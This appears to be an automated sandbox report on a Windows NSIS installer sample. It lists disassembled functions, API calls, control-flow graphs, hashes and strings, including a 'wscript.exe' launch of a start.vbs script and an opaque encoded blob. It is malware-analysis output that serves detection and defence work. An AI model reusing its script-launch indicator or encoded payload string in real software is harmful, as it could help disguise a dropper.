                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                                                                                                                    • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                    • wsprintfW.USER32 ref: 004039B1
                                                                                                                                    • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                                                                                                                    • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                                                                                                                      • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                                                                    • CopyFileW.KERNEL32(00442800,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                                                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                      • Part of subcall function 004068B4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                                                                                                                      • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7D
                                                                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B49
                                                                                                                                      • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                    • API String ID: 2017177436-2404282005
                                                                                                                                    • Opcode ID: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
                                                                                                                                    • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                                                                    • Opcode Fuzzy Hash: 2e41678f2876b0813857cd97e76b44bbe4b3eeb6df5acb682b8643e6af53fd03
                                                                                                                                    • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    [Graph image with executed / not-executed block colouring, not reproduced. Function at 00403c29, basic blocks 403c29..403efe. Notable blocks: 403c55..403caa registry lookups via call 406425 and lstrcatW (1033); 403d29..403d58 lstrlenW, lstrcmpiW (.exe), GetFileAttributesW; 403d80..403e21 LoadImageW, RegisterClassW, SystemParametersInfoW, CreateWindowExW; 403e49 ShowWindow; 403e6f..403e93 GetClassInfoW (RichEdit20W, RichEdit) and RegisterClassW; 403e99..403eca DialogBoxParamW. Node/edge list omitted; per-call details are under APIs below.]
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                      • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                    • lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
                                                                                                                                    • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                                                                                                                    • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                                                                    • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                    • API String ID: 1975747703-236412282
                                                                                                                                    • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                    • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                                                                    • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                    • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    [Graph image with executed / not-executed block colouring, not reproduced. Function at 00403082, basic blocks 403082..4032b6. Notable blocks: 403082..4030d0 GetTickCount, GetModuleFileNameW, call 406047 (open own image); 4030dc..40310a GetFileSize; 403115..4031ed loop over the file contents (call 406002, call 4034d4) with the signature comparisons that reference "Inst", "soft" and "Null" at 403167..403180; 40322c..403256 GlobalAlloc; 403258 the "Installer integrity check has failed" exit; 403290 SetFilePointer. Node/edge list omitted; per-call details are under APIs below.]
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403093
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF
                                                                                                                                      • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
                                                                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 004030FB
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00403231
                                                                                                                                    Strings
                                                                                                                                    • Null, xrefs: 00403179
                                                                                                                                    • Inst, xrefs: 00403167
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                                                                                                                    • soft, xrefs: 00403170
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                                                                                                    • Error launching installer, xrefs: 004030D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 2803837635-1044865066
                                                                                                                                    • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                    • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                                                                                                                    • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                                                                                                    • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 290 4032b9-4032d0 291 4032d2 290->291 292 4032d9-4032e2 290->292 291->292 293 4032e4 292->293 294 4032eb-4032f0 292->294 293->294 295 403300-40330d call 4034d4 294->295 296 4032f2-4032fb call 4034ea 294->296 300 4034c2 295->300 301 403313-403317 295->301 296->295 302 4034c4-4034c5 300->302 303 40346d-40346f 301->303 304 40331d-403366 GetTickCount 301->304 307 4034cd-4034d1 302->307 305 403471-403474 303->305 306 4034af-4034b2 303->306 308 4034ca 304->308 309 40336c-403374 304->309 305->308 310 403476 305->310 313 4034b4 306->313 314 4034b7-4034c0 call 4034d4 306->314 308->307 311 403376 309->311 312 403379-403387 call 4034d4 309->312 316 403479-40347f 310->316 311->312 312->300 324 40338d-403396 312->324 313->314 314->300 322 4034c7 314->322 319 403481 316->319 320 403483-403491 call 4034d4 316->320 319->320 320->300 327 403493-40349f call 4060f9 320->327 322->308 326 40339c-4033bc call 406aa6 324->326 332 4033c2-4033d5 GetTickCount 326->332 333 403465-403467 326->333 334 4034a1-4034ab 327->334 335 403469-40346b 327->335 336 403420-403422 332->336 337 4033d7-4033df 332->337 333->302 334->316 342 4034ad 334->342 335->302 340 403424-403428 336->340 341 403459-40345d 336->341 338 4033e1-4033e5 337->338 339 4033e7-40341d MulDiv wsprintfW call 4055dc 337->339 338->336 338->339 339->336 344 40342a-403431 call 4060f9 340->344 345 40343f-40344a 340->345 341->309 346 403463 341->346 342->308 350 403436-403438 344->350 349 40344d-403451 345->349 346->308 349->326 351 403457 349->351 350->335 352 40343a-40343d 350->352 351->308 352->349
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • ... %d%%, xrefs: 00403400
                                                                                                                                    • A, xrefs: 00403379
                                                                                                                                    • A, xrefs: 00403483
                                                                                                                                    • Wa+BKmsSxijL0M6HU8UlEOHEX0W4qJVOi+4o/+r4xuW4akzuquTsqs12o9a5mJuac3OoUPQTebamLvDjiKXnLZpN0JaiUym/5rzp0FZR6is2WvaUb03if+q5dpk8ngDo8D4utGAJtaQmGVDCYjM+ssBvJuB0L8h0LwGK9VsOW/iaVIvz6lsLFq7WuuIAOiOhDVs8SWueGeepJey+APZ9AngJ8/GHvNSJGrjYLE8PtJvnkfgYavejAThOUugGeRIfF91R, xrefs: 0040333D
                                                                                                                                    • *B, xrefs: 004032E4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                    • String ID: *B$ A$ A$... %d%%$Wa+BKmsSxijL0M6HU8UlEOHEX0W4qJVOi+4o/+r4xuW4akzuquTsqs12o9a5mJuac3OoUPQTebamLvDjiKXnLZpN0JaiUym/5rzp0FZR6is2WvaUb03if+q5dpk8ngDo8D4utGAJtaQmGVDCYjM+ssBvJuB0L8h0LwGK9VsOW/iaVIvz6lsLFq7WuuIAOiOhDVs8SWueGeepJey+APZ9AngJ8/GHvNSJGrjYLE8PtJvnkfgYavejAThOUugGeRIfF91R
                                                                                                                                    • API String ID: 551687249-1049729664
                                                                                                                                    • Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                    • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                                                                                                    • Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
                                                                                                                                    • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 353 406594-40659d 354 4065b0-4065ca 353->354 355 40659f-4065ae 353->355 356 4065d0-4065dc 354->356 357 4067da-4067e0 354->357 355->354 356->357 360 4065e2-4065e9 356->360 358 4067e6-4067f3 357->358 359 4065ee-4065fb 357->359 362 4067f5-4067fa call 406557 358->362 363 4067ff-406802 358->363 359->358 361 406601-40660a 359->361 360->357 364 406610-406653 361->364 365 4067c7 361->365 362->363 369 406659-406665 364->369 370 40676b-40676f 364->370 367 4067d5-4067d8 365->367 368 4067c9-4067d3 365->368 367->357 368->357 371 406667 369->371 372 40666f-406671 369->372 373 406771-406778 370->373 374 4067a3-4067a7 370->374 371->372 377 406673-406699 call 406425 372->377 378 4066ab-4066ae 372->378 375 406788-406794 call 406557 373->375 376 40677a-406786 call 40649e 373->376 379 4067b7-4067c5 lstrlenW 374->379 380 4067a9-4067b2 call 406594 374->380 389 406799-40679f 375->389 376->389 394 406753-406756 377->394 395 40669f-4066a6 call 406594 377->395 384 4066b0-4066bc GetSystemDirectoryW 378->384 385 4066c1-4066c4 378->385 379->357 380->379 390 40674e-406751 384->390 391 4066d6-4066da 385->391 392 4066c6-4066d2 GetWindowsDirectoryW 385->392 389->379 396 4067a1 389->396 390->394 397 406763-406769 call 406805 390->397 391->390 393 4066dc-4066fa 391->393 392->391 399 4066fc-406702 393->399 400 40670e-406726 call 40694b 393->400 394->397 402 406758-40675e lstrcatW 394->402 395->390 396->397 397->379 406 40670a-40670c 399->406 410 406728-40673b SHGetPathFromIDListW CoTaskMemFree 400->410 411 40673d-406746 400->411 402->397 406->400 408 406748-40674c 406->408 408->390 410->408 410->411 411->393 411->408
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066B6
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004066CC
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040672A
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                                                                                                    • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040675E
                                                                                                                                    • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004067B8
                                                                                                                                    Strings
                                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                    • API String ID: 4024019347-730719616
                                                                                                                                    • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                    • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                                                                                                    • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                                                                                                    • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 412 401774-401799 call 402dab call 405e9d 417 4017a3-4017b5 call 406557 call 405e26 lstrcatW 412->417 418 40179b-4017a1 call 406557 412->418 423 4017ba-4017bb call 406805 417->423 418->423 427 4017c0-4017c4 423->427 428 4017c6-4017d0 call 4068b4 427->428 429 4017f7-4017fa 427->429 437 4017e2-4017f4 428->437 438 4017d2-4017e0 CompareFileTime 428->438 431 401802-40181e call 406047 429->431 432 4017fc-4017fd call 406022 429->432 439 401820-401823 431->439 440 401892-4018bb call 4055dc call 4032b9 431->440 432->431 437->429 438->437 441 401874-40187e call 4055dc 439->441 442 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 439->442 454 4018c3-4018cf SetFileTime 440->454 455 4018bd-4018c1 440->455 452 401887-40188d 441->452 442->427 474 401869-40186a 442->474 456 402c38 452->456 458 4018d5-4018e0 FindCloseChangeNotification 454->458 455->454 455->458 462 402c3a-402c3e 456->462 459 4018e6-4018e9 458->459 460 402c2f-402c32 458->460 463 4018eb-4018fc call 406594 lstrcatW 459->463 464 4018fe-401901 call 406594 459->464 460->456 470 401906-4023a7 call 405bb7 463->470 464->470 470->460 470->462 474->452 476 40186c-40186d 474->476 476->441
                                                                                                                                    APIs
                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,"wscript.exe" "C:\Users\user\start.vbs","wscript.exe" "C:\Users\user\start.vbs",00000000,00000000,"wscript.exe" "C:\Users\user\start.vbs",00440000,?,?,00000031), ref: 004017DA
                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
                                                                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                    • String ID: "wscript.exe" "C:\Users\user\start.vbs"$C:\Users\user
                                                                                                                                    • API String ID: 1941528284-590609670
                                                                                                                                    • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                    • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                                                                    • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                    • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 478 4068db-4068fb GetSystemDirectoryW 479 4068fd 478->479 480 4068ff-406901 478->480 479->480 481 406912-406914 480->481 482 406903-40690c 480->482 484 406915-406948 wsprintfW LoadLibraryExW 481->484 482->481 483 40690e-406910 482->483 483->484
                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                    • wsprintfW.USER32 ref: 0040692D
                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406941
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
